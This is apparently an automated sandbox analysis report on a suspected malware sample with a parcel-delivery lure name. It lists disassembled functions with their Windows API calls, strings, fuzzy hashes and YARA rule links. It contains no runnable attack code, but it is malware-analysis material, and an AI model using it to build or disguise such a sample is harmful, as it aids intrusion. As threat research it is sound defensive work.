API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: de00fc032483cc96bfeb4e4e6a2b094ebc4b7f62c7efe73d223e1025ed45c4e5
Instruction ID: dbe649b1d3951c53ac8d644f83b4cd4abb53d0579fa9b38909265a540e4caec6
Opcode Fuzzy Hash: de00fc032483cc96bfeb4e4e6a2b094ebc4b7f62c7efe73d223e1025ed45c4e5
Instruction Fuzzy Hash: 7E9180355046419FD720DF16C989F1ABBE0AF44318F1485A9F4A98B6A2C7B0FD85CF91

Function 00AE8CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00AE8CF3

Part of subcall function 00AC8E54: _wcslen.LIBCMT ref: 00AC8E77

_wcslen.LIBCMT ref: 00AE8D4E
_wcslen.LIBCMT ref: 00AE8D9C
_wcslen.LIBCMT ref: 00AE8DDC
_wcslen.LIBCMT ref: 00AE8E6E

Strings

stdcall, xrefs: 00AE8DD6, 00AE8DDB
winapi, xrefs: 00AE8D96, 00AE8D9B
cdecl, xrefs: 00AE8D48, 00AE8D4D
none, xrefs: 00AE8E65, 00AE8E6A

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 4d6857c7973bca085872db6c20890ea13927eab20c6812e8d8c9952ba01244dc
Instruction ID: 478c92629f02e1698908bbddf290cf6ed4b1e65dd7f21b565ecf13d61d9d87a1
Opcode Fuzzy Hash: 4d6857c7973bca085872db6c20890ea13927eab20c6812e8d8c9952ba01244dc
Instruction Fuzzy Hash: 2D51A332A005569BCF24DF6DC9809BEB7B5BF64724B214269E42AE72C4DF39DD40C790

Function 00AE372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00AE3774
CoUninitialize.OLE32 ref: 00AE377F
CoCreateInstance.OLE32(?,00000000,00000017,00AFFB78,?), ref: 00AE37D9
IIDFromString.OLE32(?,?), ref: 00AE384C
VariantInit.OLEAUT32(?), ref: 00AE38E4
VariantClear.OLEAUT32(?), ref: 00AE3936

Strings

Invalid parameter, xrefs: 00AE3865
NULL Pointer assignment, xrefs: 00AE381E
Failed to create object, xrefs: 00AE37E4, 00AE389A

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: e32c73cf523c7d32e5a7fd9c0530a233c91f1924736ca7dfd4d8f1d218598106
Instruction ID: 3d0813ef7eb73bbdaa482e934e9672b085fff4882b1bee0dd578ea84601b9e43
Opcode Fuzzy Hash: e32c73cf523c7d32e5a7fd9c0530a233c91f1924736ca7dfd4d8f1d218598106
Instruction Fuzzy Hash: EE61AC72608351AFDB10DF56C988F6ABBF8AF49754F004849F9859B291C770EE48CB92

Function 00A65BEA Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00A65C7A

Part of subcall function 00A65D0A: GetClientRect.USER32(?,?), ref: 00A65D30
Part of subcall function 00A65D0A: GetWindowRect.USER32(?,?), ref: 00A65D71
Part of subcall function 00A65D0A: ScreenToClient.USER32(?,?), ref: 00A65D99

GetDC.USER32 ref: 00AA46F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00AA4708
SelectObject.GDI32(00000000,00000000), ref: 00AA4716
SelectObject.GDI32(00000000,00000000), ref: 00AA472B
ReleaseDC.USER32(?,00000000), ref: 00AA4733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00AA47C4

Strings

@U=u, xrefs: 00AA4708
U, xrefs: 00AA4693

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: @U=u$U
API String ID: 4009187628-4110099822
Opcode ID: b576478b2c71a1369e667d6f9fee6f30f88e966f6fb5a1cc88d52c25d53de68e
Instruction ID: 5eea5196bd07610c41ca85cfb1e42c97ec575aa88f34a8873a5408dcf68111ff
Opcode Fuzzy Hash: b576478b2c71a1369e667d6f9fee6f30f88e966f6fb5a1cc88d52c25d53de68e
Instruction Fuzzy Hash: 9F71D031800249DFCF21CFA4C984ABA7BB5FF8B360F244269F9555B2A6C7718842DF50

Function 00AF8B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A79BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A79BB2

Part of subcall function 00A7912D: GetCursorPos.USER32(?), ref: 00A79141
Part of subcall function 00A7912D: ScreenToClient.USER32(00000000,?), ref: 00A7915E
Part of subcall function 00A7912D: GetAsyncKeyState.USER32(00000001), ref: 00A79183
Part of subcall function 00A7912D: GetAsyncKeyState.USER32(00000002), ref: 00A7919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00AF8B6B
ImageList_EndDrag.COMCTL32 ref: 00AF8B71
ReleaseCapture.USER32 ref: 00AF8B77
SetWindowTextW.USER32(?,00000000), ref: 00AF8C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00AF8C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00AF8CFF

Strings

@GUI_DROPID, xrefs: 00AF8C51
@GUI_DRAGFILE, xrefs: 00AF8C9A
@U=u, xrefs: 00AF8C25

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$@U=u
API String ID: 1924731296-2104563098
Opcode ID: ad745ff894901e92d9a00523c2438be293ee1976c1dead440616c67439647127
Instruction ID: 907e5d35cec4484d60aa196d2ca17fdaf5fbfa235e09f5f42016c2780bf7498e
Opcode Fuzzy Hash: ad745ff894901e92d9a00523c2438be293ee1976c1dead440616c67439647127
Instruction Fuzzy Hash: 2B518C71104308AFD700DF64DE55BBE77E8FB88750F100A29FA56972E1CB749905CB62

Function 00AD3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00AD33CF

Part of subcall function 00A69CB3: _wcslen.LIBCMT ref: 00A69CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00AD33F0

Strings

Incorrect parameters to object property !, xrefs: 00AD34AB
^ ERROR , xrefs: 00AD349E
"%s" (%d) : ==> %s:%s%s, xrefs: 00AD3504
"%s" (%d) : ==> %s:, xrefs: 00AD3522
Error: , xrefs: 00AD34D1
Line %d (File "%s"):, xrefs: 00AD3443, 00AD345C

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 199b17e61f9ce95f48cfd756252f7dcab39f5c6aad51b88002e9c6af7413b669
Instruction ID: fd9fbbf249d1ff1a7808429df525b130079ba553b90c7e4d18919310be10ca36
Opcode Fuzzy Hash: 199b17e61f9ce95f48cfd756252f7dcab39f5c6aad51b88002e9c6af7413b669
Instruction Fuzzy Hash: 91517F72900209BADF15EBE0DE46EEEB7B8AF14340F204465F50A731A1EB312F59DB61

Function 00ACB5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00ACB5FC
_wcslen.LIBCMT ref: 00ACB608
_wcslen.LIBCMT ref: 00ACB64D
_wcslen.LIBCMT ref: 00ACB68C
_wcslen.LIBCMT ref: 00ACB6C7

Strings

APPEND, xrefs: 00ACB6C1, 00ACB6C6
REMOVE, xrefs: 00ACB602, 00ACB607
EXISTS, xrefs: 00ACB686, 00ACB68B
KEYS, xrefs: 00ACB647, 00ACB64C

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: 7b0714b833459a5cc73ba9020603426abc1b049f5103122e47f07a8ca09ff285
Instruction ID: 546c9d764fa6474bca2862b0ba1caebc1cd5e5b5994e034908a3fe5c46511b0d
Opcode Fuzzy Hash: 7b0714b833459a5cc73ba9020603426abc1b049f5103122e47f07a8ca09ff285
Instruction Fuzzy Hash: 5641E732A110279ACB206F7DC992BBE77B5AF60754F26452DE825D7284E732CD81C7A0

Function 00AD5393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00AD53A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00AD5416
GetLastError.KERNEL32 ref: 00AD5420
SetErrorMode.KERNEL32(00000000,READY), ref: 00AD54A7

Strings

READONLY, xrefs: 00AD5452
READY, xrefs: 00AD5460, 00AD5468
UNKNOWN, xrefs: 00AD5444
NOTREADY, xrefs: 00AD544B
INVALID, xrefs: 00AD5459

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 55a8e97ae0dac87a4b812bb5ff0c2cc8c1b757fe3d44b90887b8f552ecace83f
Instruction ID: fe3ebb20d19431137c82615cbcc1fdacc92ca3949b285ab378645ed3e4fe1024
Opcode Fuzzy Hash: 55a8e97ae0dac87a4b812bb5ff0c2cc8c1b757fe3d44b90887b8f552ecace83f
Instruction Fuzzy Hash: 5F3190B5E006089FD710DF78C584AAABBB5FF45305F14806AE406DB392DB71DD86CB92

Function 00AF2D03 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00AF2D1B
GetDC.USER32(00000000), ref: 00AF2D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AF2D2E
ReleaseDC.USER32(00000000,00000000), ref: 00AF2D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00AF2D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00AF2D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00AF5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00AF2DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00AF2DE1

Strings

@U=u, xrefs: 00AF2D87, 00AF2DE1

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID: @U=u
API String ID: 3864802216-2594219639
Opcode ID: f6e0d015c52b154959cecd1049cc51a462be4f159ac5dce5eea2398c4cbd5c10
Instruction ID: 2f46e9836b35ac324fa32a868853d6816c9465c7c858949490cb8d35b8a417d7
Opcode Fuzzy Hash: f6e0d015c52b154959cecd1049cc51a462be4f159ac5dce5eea2398c4cbd5c10
Instruction Fuzzy Hash: 40316B72201618BBEB118F91CD8AFFB3BA9EF09725F044055FE08DA291C6759C51CBA4

Function 00AC209F Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00AC20AB
GetClassNameW.USER32(00000000,?,00000100), ref: 00AC20C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00AC214D

Strings

largeicons, xrefs: 00AC20E1
list, xrefs: 00AC212F
@U=u, xrefs: 00AC214D
smallicons, xrefs: 00AC2115
details, xrefs: 00AC20FB
SHELLDLL_DefView, xrefs: 00AC20CC

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: @U=u$SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-1428604138
Opcode ID: bf1fbc1f0116f62e4e15740bc793a65205e9b1b993c2afeda5b2909535e44301
Instruction ID: c5bc98a7f94b4d69df3bfd342ec01fff2bef66f07c0767085795c5c52be9f61f
Opcode Fuzzy Hash: bf1fbc1f0116f62e4e15740bc793a65205e9b1b993c2afeda5b2909535e44301
Instruction Fuzzy Hash: 32110676688717B9FA157720EC0AFF677DCCF08364B21026AFB08A90E1FE7568025B14

Function 00AF3A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00AF3A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00AF3AA0
GetWindowLongW.USER32(?,000000F0), ref: 00AF3AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AF3AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00AF3B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00AF3BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00AF3BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00AF3BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00AF3BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00AF3C13

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: a76239c83f7d5b7e64c8806eaa1a6d1f783d9d4386907eb0e15d738541b0027b
Instruction ID: 34535a5b7de34b8f70a1bf715afc7cdbe7d73bb4e143502cd2ef9789e979334e
Opcode Fuzzy Hash: a76239c83f7d5b7e64c8806eaa1a6d1f783d9d4386907eb0e15d738541b0027b
Instruction Fuzzy Hash: B9615875A00248AFDB10DFA8CD81EFE77B8EB09710F104199FA15EB2A1D774AE46DB50

Function 00ACB12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00ACB151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00ACA1E1,?,00000001), ref: 00ACB165
GetWindowThreadProcessId.USER32(00000000), ref: 00ACB16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00ACA1E1,?,00000001), ref: 00ACB17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 00ACB18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00ACA1E1,?,00000001), ref: 00ACB1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00ACA1E1,?,00000001), ref: 00ACB1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00ACA1E1,?,00000001), ref: 00ACB1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00ACA1E1,?,00000001), ref: 00ACB212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00ACA1E1,?,00000001), ref: 00ACB21D

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 3dd15c6ded4f3a4a17d8f64bddac0ebe44f61e6053cf0a32fb93a0b5f2765710
Instruction ID: ce53649919f3e3364657f6fb1ef8df08d32ea7bd1aa9c28ad32d87d4ad8d1980
Opcode Fuzzy Hash: 3dd15c6ded4f3a4a17d8f64bddac0ebe44f61e6053cf0a32fb93a0b5f2765710
Instruction Fuzzy Hash: 1831B871120208AFDB209FA5DD5AFBE7BA9AB10761F224008FA00C71A0CBB59E41CF30

Function 00A92C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00A92C94

Part of subcall function 00A929C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00A9D7D1,00000000,00000000,00000000,00000000,?,00A9D7F8,00000000,00000007,00000000,?,00A9DBF5,00000000), ref: 00A929DE
Part of subcall function 00A929C8: GetLastError.KERNEL32(00000000,?,00A9D7D1,00000000,00000000,00000000,00000000,?,00A9D7F8,00000000,00000007,00000000,?,00A9DBF5,00000000,00000000), ref: 00A929F0

_free.LIBCMT ref: 00A92CA0
_free.LIBCMT ref: 00A92CAB
_free.LIBCMT ref: 00A92CB6
_free.LIBCMT ref: 00A92CC1
_free.LIBCMT ref: 00A92CCC
_free.LIBCMT ref: 00A92CD7
_free.LIBCMT ref: 00A92CE2
_free.LIBCMT ref: 00A92CED
_free.LIBCMT ref: 00A92CFB

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b13ad9ff3c3cd6fc219f56716157d146a181c952f5664f22cf031bb09f2c547f
Instruction ID: ea5ffe68754967c1e3fc19c8643c396bbd7c587f0a40992e19ba1ca96543a8d0
Opcode Fuzzy Hash: b13ad9ff3c3cd6fc219f56716157d146a181c952f5664f22cf031bb09f2c547f
Instruction Fuzzy Hash: 4D116376600108BFCF02EF54DA82EDD3BE5FF45350F5145A5FA489B222DA31EE509B90

Function 00A61410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00A61459
OleUninitialize.OLE32(?,00000000), ref: 00A614F8
UnregisterHotKey.USER32(?), ref: 00A616DD
DestroyWindow.USER32(?), ref: 00AA24B9
FreeLibrary.KERNEL32(?), ref: 00AA251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AA254B

Strings

close all, xrefs: 00A61454

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: e5d2462726afa6107d429a7fd3d34ca8ea20d2cd16f6a45ba6234d6d5a146192
Instruction ID: 8068f94a5bac4e7a71666a6796ad6e05d36db604ae6de887ecd575445398e0c1
Opcode Fuzzy Hash: e5d2462726afa6107d429a7fd3d34ca8ea20d2cd16f6a45ba6234d6d5a146192
Instruction Fuzzy Hash: F1D15E31701212CFCB29EF59CA95B69FBB4BF05710F1881ADE54A6B291DB30AD22CF51

Function 00AD359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00AD35E4

Part of subcall function 00A69CB3: _wcslen.LIBCMT ref: 00A69CBD

LoadStringW.USER32(00B32390,?,00000FFF,?), ref: 00AD360A

Strings

^ ERROR, xrefs: 00AD36C9
"%s" (%d) : ==> %s:%s%s, xrefs: 00AD3724
"%s" (%d) : ==> %s:, xrefs: 00AD3742
Error: , xrefs: 00AD36EF
Line %d (File "%s"):, xrefs: 00AD366B

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 169b481aab32664b84f146df6048233cd425721c062317bfc975673d277fffce
Instruction ID: 3ef495f169efa79205a7c22de8838ae8e51b095c13234169804a545c873a0bd5
Opcode Fuzzy Hash: 169b481aab32664b84f146df6048233cd425721c062317bfc975673d277fffce
Instruction Fuzzy Hash: 83516D72800219BBDF14EBE0DE46EEEBB78AF14300F144165F115762A1EB316B99DFA1

